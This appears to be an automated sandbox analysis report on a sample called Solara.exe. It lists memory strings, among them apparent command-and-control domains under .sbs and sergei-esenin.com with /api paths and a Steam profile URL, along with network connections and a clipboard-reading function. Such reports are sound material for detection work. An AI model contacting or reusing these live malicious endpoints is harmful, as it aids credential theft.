Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: Solara.exe, 00000001.00000003.1827882998.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1821266637.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828891026.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: Solara.exe, 00000001.00000003.1767376212.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condifendteu.sbs/
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condifendteu.sbs/1
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condifendteu.sbs/api
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://condifendteu.sbs/apiNtM
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/
Source: Solara.exe, 00000001.00000003.1799781454.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/T
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/api
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/api9et
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/apiKtJ
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/apiZ8
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawwyobstacw.sbs/apioe
Source: Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ehticsprocw.sbs/
Source: Solara.exe, 00000001.00000003.1799781454.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748853374.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1767376212.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/
Source: Solara.exe, 00000001.00000003.1799781454.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748853374.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1767376212.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/W
Source: Solara.exe, 00000001.00000003.1738612549.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enlargkiw.sbs/api
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/
Source: Solara.exe, 00000001.00000003.1748853374.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/2
Source: Solara.exe, 00000001.00000003.1738612549.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748853374.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1767376212.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748927531.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/api
Source: Solara.exe, 00000001.00000003.1738612549.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/apitrf
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: Solara.exe, 00000001.00000003.1828000747.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1814943292.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: Solara.exe, 00000001.00000003.1814184391.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/0
Source: Solara.exe, 00000001.00000002.1828698814.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: Solara.exe, 00000001.00000003.1799781454.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/apit
Source: Solara.exe, 00000001.00000003.1807430928.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807265156.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/m
Source: Solara.exe, 00000001.00000003.1814184391.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/ny
Source: Solara.exe, 00000001.00000003.1828000747.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/api
Source: Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/apiU
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Solara.exe, 00000001.00000003.1748853374.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/
Source: Solara.exe, 00000001.00000003.1738612549.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748853374.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748927531.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/api
Source: Solara.exe, 00000001.00000003.1799781454.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1748853374.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1767376212.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1738612549.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/j
Source: Solara.exe, 00000001.00000003.1828000747.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-err
Source: Solara.exe, 00000001.00000003.1807265156.0000000001005000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1827882998.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807265156.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1821266637.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807410571.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1829163932.0000000003536000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828171164.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807390109.0000000001000000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828891026.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: Solara.exe, 00000001.00000002.1829163932.0000000003534000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-m
Source: Solara.exe, 00000001.00000003.1799781454.0000000000F84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-mY
Source: Solara.exe, 00000001.00000003.1814350837.0000000001005000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1814184391.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-man
Source: Solara.exe, 00000001.00000002.1829163932.0000000003536000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-manHY
Source: Solara.exe, 00000001.00000003.1807265156.0000000001005000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1828000747.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000003.1807410571.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000001.00000002.1828698814.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: Solara.exe, 00000001.00000003.1799727485.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: Solara.exe, 00000001.00000003.1799757603.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: C:\Users\user\Desktop\Solara.exe

Code function: 1_2_00436290 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

1_2_00436290

Source: C:\Users\user\Desktop\Solara.exe

Code function: 1_2_00436290 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

1_2_00436290

Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C22093	0_2_00C22093
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C7001B	0_2_00C7001B
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C222DB	0_2_00C222DB
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C7038F	0_2_00C7038F
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CFE350	0_2_00CFE350
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CDC490	0_2_00CDC490
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C8452C	0_2_00C8452C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C706F4	0_2_00C706F4
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00D007E0	0_2_00D007E0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C8C87D	0_2_00C8C87D
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CFA800	0_2_00CFA800
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C6E816	0_2_00C6E816
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CFE830	0_2_00CFE830
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C80980	0_2_00C80980
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C7E901	0_2_00C7E901
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C9CA4C	0_2_00C9CA4C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C56A58	0_2_00C56A58
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C6EB5E	0_2_00C6EB5E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C70B15	0_2_00C70B15
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CDCDC0	0_2_00CDCDC0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C80EF0	0_2_00C80EF0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C6EEB5	0_2_00C6EEB5
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C70F45	0_2_00C70F45
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C930FA	0_2_00C930FA
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C6F1FD	0_2_00C6F1FD
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C993F8	0_2_00C993F8
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C81330	0_2_00C81330
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C6F58B	0_2_00C6F58B
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CBD560	0_2_00CBD560
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C4F50C	0_2_00C4F50C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CDD510	0_2_00CDD510
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C51670	0_2_00C51670
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C9B71C	0_2_00C9B71C
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CD98B0	0_2_00CD98B0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C6F928	0_2_00C6F928
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CF5A60	0_2_00CF5A60
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C6FCB6	0_2_00C6FCB6
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CEFD50	0_2_00CEFD50
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00C7DE2E	0_2_00C7DE2E
Source: C:\Users\user\Desktop\Solara.exe	Code function: 0_2_00CF9FB0	0_2_00CF9FB0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00411183	1_2_00411183
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042B2D0	1_2_0042B2D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004283C0	1_2_004283C0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00430570	1_2_00430570
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0043C516	1_2_0043C516
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004465D0	1_2_004465D0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040F6A0	1_2_0040F6A0
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040DD20	1_2_0040DD20
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040CF50	1_2_0040CF50
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0042E056	1_2_0042E056
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00436060	1_2_00436060
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00401000	1_2_00401000
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_004280F4	1_2_004280F4
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0043A083	1_2_0043A083
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_00440080	1_2_00440080
Source: C:\Users\user\Desktop\Solara.exe	Code function: 1_2_0040A0A0	1_2_0040A0A0
